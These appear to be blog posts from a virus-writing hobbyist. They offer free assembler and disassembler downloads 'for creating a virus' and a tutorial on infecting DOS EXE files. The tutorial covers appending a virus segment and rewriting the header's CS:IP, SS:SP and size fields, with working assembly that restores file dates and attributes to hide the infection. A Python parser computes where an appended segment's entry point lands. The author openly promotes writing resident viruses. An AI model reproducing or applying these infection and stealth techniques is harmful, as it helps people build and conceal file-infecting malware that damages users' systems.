Free Disassembler For You!!

As in the last post, where I already gave you a free assembler for your "project", now I'll give you a free disassembler so you can "experiment" (note that I said EXPERIMENT, LOL) with assembly language, or disassemble a complete project.



Turbo Assembler Free Download For You!

For so long I have given you tips and tutorials for creating a virus, but I never gave you the tools to create them. I think now is the time to give you, my fellow readers, a freebie.

Download the free Turbo Assembler here. Thank you for being with me. :D



EXE Infections: Part 1 "Infection Process" Cont'

The first thing to do is read the EXE header of the file to be infected! That is done by...
Next, after reading the first 28 bytes, you will need to set your file pointer to the end of the file.

After bringing your virus to the end of the file, you may start the infection process.
;Remember BX = File Handle, DX:AX = File Pointer Location (EOF)

The following finds the new CS:IP and SS:SP values. It creates a new segment, and CS:IP will point to the beginning of the virus. If you have other code in front of it, so the virus entry is further down than the first byte, just add that number of bytes to AX.
Now we are ready to write the virus to the EXE file! (Yeah!)

This code works 100% as is! (Resident virus.) For non-residents, add a location pointer. Besides, why the hell would you write a non-resident virus? LOL!!~

Stay RESIDENT in my site OKAY!!!~

EXE Infections: Part 1 "Infection Process"

[Image: AIDS (computer virus), via Wikipedia]

We must admit there is a HUGE number of lame viruses out there. Ever wonder why so many people talk about the AIDS virus? It's a fucking overwriting virus. It's HUGE in size and it's written in PASCAL. Please! Have a little more respect for the virus world. What happened to that old Bulgarian spirit? That too has died. Bulgaria isn't writing as many top viruses as it used to! Or are we in for a surprise? (USSR kicks!)



Well, to help people advance their virus programming ability, I will try to explain the basics of infecting an EXE file. There are several ways to infect an EXE file, and I have tried several of them. The best one I have programmed is the one you'll see here. Basically, it infects EXEs by starting a new segment used only by the virus. That lets it infect EXEs over 64k in size, and it is a lot less complicated.


Before we can begin we must know a few things about EXEs. Let's say a .COM file has been loaded at segment address 1234:0000. When the COM file runs, its code is limited to 1234:0000 through 1234:FFFF (64k). EXE files, on the other hand, are basically several COMs in one: an EXE can set up DATA in one segment, CODE in another and STACK in another. An EXE can have any number of segments; the only limit is available memory. The EXE file keeps track of these segments with an EXE header, which tells DOS which segments start where, how big the file is and how much memory it needs to run. The EXE header is the first few bytes of the EXE file.


If you load an EXE file with DEBUG you will not run into the EXE header, because DEBUG uses the header to set up CS:IP, SS:SP and so on, and the header itself never lands in memory. You can still view the header with DEBUG if you rename the file first and then run DEBUG on the renamed file. The extension can be anything you wish, but don't rename it to .COM or .BIN; DEBUG treats those differently (rename it to .COM and DEBUG loads the IP register with 0100h). The fixed part of the EXE header is 28 bytes, but it is stored as 32 bytes, because the header size field (offset 08h) is counted in 16-byte paragraphs, so 28 bytes must be rounded up to 2 paragraphs (16*2). If the file has relocation entries, the relocation table (which starts at the offset stored at 18h) follows the fixed part and the header grows accordingly, so always take the real header size from offset 08h rather than assuming 32. The last 4 bytes of that padding are unused by DOS, though that doesn't stop a virus from using them. Just popping ideas out in the open. Anyhow, this is what the EXE header consists of:


START OFFSETS       DESCRIPTION
(hex)   (dec)

 00  |  00  | Always 4D 5A ("MZ"). Marks this file as an .EXE file
*02  |  02  | Number of bytes in the last 512-byte page of the file (file size mod 512; 0 means the last page is full)
*04  |  04  | Size of file in 512-byte pages, header included
 06  |  06  | Number of relocation table entries
@08  |  08  | Size of header in paragraphs (16 bytes each)
 0A  |  10  | Minimum number of paragraphs required after the loaded program
 0C  |  12  | Maximum number of paragraphs required after the loaded program
*0E  |  14  | (SS) Offset of stack segment in the load module, in paragraphs
*10  |  16  | SP register is loaded with this word
 12  |  18  | Negative sum (ignoring overflow) of all words in the file (checksum; DOS does not verify it)
*14  |  20  | IP register is loaded with this word
*16  |  22  | (CS) Offset of code segment in the load module, in paragraphs
 18  |  24  | Offset of the first relocation item (start of the relocation table)
 1A  |  26  | Overlay number. If no overlays are used, this is 0

* = Will be edited by our virus
@ = Needed to help our reconstruction of the EXE header
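To make the table (and the "new CS:IP" arithmetic from the continuation post above) concrete, here is a small header parser. It is an added example written for this page, not code from the original posts: it decodes the 28-byte fixed header, derives the sizes DOS computes from it, verifies the "negative sum" checksum, reports how many bytes sit past the header-declared image (the place an appended body would live), and returns the CS:IP at which a segment appended to the end of the load module would start. The tiny EXE it runs on is constructed in the block itself (a 32-byte header plus a 16-byte exit stub); all function names are my own.

```python
import struct

# Fixed part of the MZ header: the 28 bytes the table above describes.
# "MZ" magic followed by 13 little-endian words.
MZ_HEADER = struct.Struct("<2s13H")
MZ_FIELD_NAMES = (
    "magic", "bytes_in_last_page", "pages", "reloc_count", "header_paras",
    "min_alloc", "max_alloc", "ss", "sp", "checksum", "ip", "cs",
    "reloc_table_offset", "overlay",
)


def word_sum(data: bytes) -> int:
    """16-bit sum of all little-endian words, overflow ignored (odd tail zero-padded)."""
    if len(data) % 2:
        data += b"\0"
    return sum(struct.unpack("<%dH" % (len(data) // 2), data)) & 0xFFFF


def mz_checksum(image: bytes) -> int:
    """Value for offset 12h that makes all words of the file sum to zero (the 'negative sum')."""
    zeroed = image[:0x12] + b"\0\0" + image[0x14:]
    return (-word_sum(zeroed)) & 0xFFFF


def checksum_ok(image: bytes) -> bool:
    """True when the file's words sum to zero. DOS never checks this, so real files often fail."""
    return word_sum(image) == 0


def parse_mz_header(image: bytes) -> dict:
    """Decode the fixed header and derive the sizes and file offsets DOS computes from it."""
    if len(image) < MZ_HEADER.size:
        raise ValueError("file shorter than an MZ header")
    hdr = dict(zip(MZ_FIELD_NAMES, MZ_HEADER.unpack_from(image, 0)))
    if hdr["magic"] not in (b"MZ", b"ZM"):  # DOS accepts the magic in either byte order
        raise ValueError("not an MZ executable")
    pages, last = hdr["pages"], hdr["bytes_in_last_page"]
    # Offsets 02h/04h: whole 512-byte pages, the last one partial if the remainder is non-zero.
    hdr["image_size"] = pages * 512 if last == 0 else (pages - 1) * 512 + last
    hdr["header_bytes"] = hdr["header_paras"] * 16  # offset 08h is in paragraphs
    hdr["load_module_size"] = hdr["image_size"] - hdr["header_bytes"]
    # CS and SS are paragraph offsets relative to the start of the load module, which begins
    # right after the header, so the file offsets of entry point and stack top follow directly.
    hdr["entry_file_offset"] = hdr["header_bytes"] + hdr["cs"] * 16 + hdr["ip"]
    hdr["stack_top_file_offset"] = hdr["header_bytes"] + hdr["ss"] * 16 + hdr["sp"]
    # Bytes beyond the header-declared image are never loaded by DOS; this is where
    # anything appended to the file without updating offsets 02h/04h ends up.
    hdr["trailing_bytes"] = max(0, len(image) - hdr["image_size"])
    return hdr


def appended_segment_entry(hdr: dict) -> tuple:
    """(CS, IP) of the first byte after the current load module, i.e. where a new
    segment appended at the end of the image would begin (the post's 'new CS:IP')."""
    return divmod(hdr["load_module_size"], 16)


def build_sample_exe(code: bytes) -> bytes:
    """Constructed sample, not a real file: 2-paragraph header, no relocations, code as load module."""
    header_paras = 2  # 28 fixed bytes rounded up to 32
    total = header_paras * 16 + len(code)
    pages, last = divmod(total, 512)
    if last:
        pages += 1
    fixed = MZ_HEADER.pack(b"MZ", last, pages, 0, header_paras, 0, 0xFFFF,
                           0, 0x100, 0, 0, 0, 0x1C, 0)
    image = fixed + b"\0" * 4 + code  # the 4 padding bytes DOS ignores
    return image[:0x12] + struct.pack("<H", mz_checksum(image)) + image[0x14:]


# Constructed 16-byte load module: mov ah,4Ch / int 21h (exit to DOS), padded with NOPs.
SAMPLE_EXE = build_sample_exe(b"\xb4\x4c\xcd\x21" + b"\x90" * 12)

if __name__ == "__main__":
    info = parse_mz_header(SAMPLE_EXE)
    for name, value in info.items():
        print(f"{name:22} {value!r}")
    print("checksum ok:", checksum_ok(SAMPLE_EXE))
    print("appended segment would start at CS:IP = %04X:%04X" % appended_segment_entry(info))
```

Run it against a real .EXE by replacing SAMPLE_EXE with the file's bytes: a non-zero trailing_bytes means the file carries data past what the header says DOS should load, which is exactly what the starred fields (02h, 04h, 0Eh, 10h, 14h, 16h) get rewritten to hide in the scheme described above.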


Cover your tracks

This step, though simple to do, is too easily neglected. It is extremely important, as a wary user will be alerted to the presence of a virus by any unexplained change to a file. In its simplest form it means restoring the file's attributes, time and date, which you saved before opening the file for writing (here as f_attrib, f_time and f_date, addressed relative to BP). This is done with the following:

mov ax, 5701h                    ; Set file time/date (AL = 1: set)
mov dx, word ptr [bp+f_date]     ; DX = saved date stamp
mov cx, word ptr [bp+f_time]     ; CX = saved time stamp
int 21h                          ; BX still holds the file handle. Do this BEFORE closing,
                                 ; or the close will stamp the file with the current time
mov ah, 3eh                      ; Close the file handle in BX
int 21h
mov ax, 4301h                    ; Set file attributes (AL = 1: set)
lea dx, [bp+offset DTA + 1Eh]    ; DS:DX -> ASCIIZ filename, still in the DTA from FindFirst/FindNext
xor ch, ch                       ; CH must be zero
mov cl, byte ptr [bp+f_attrib]   ; CX = saved attribute byte
int 21h

Remember also to restore the current directory to the original one if it was changed during the run of the virus.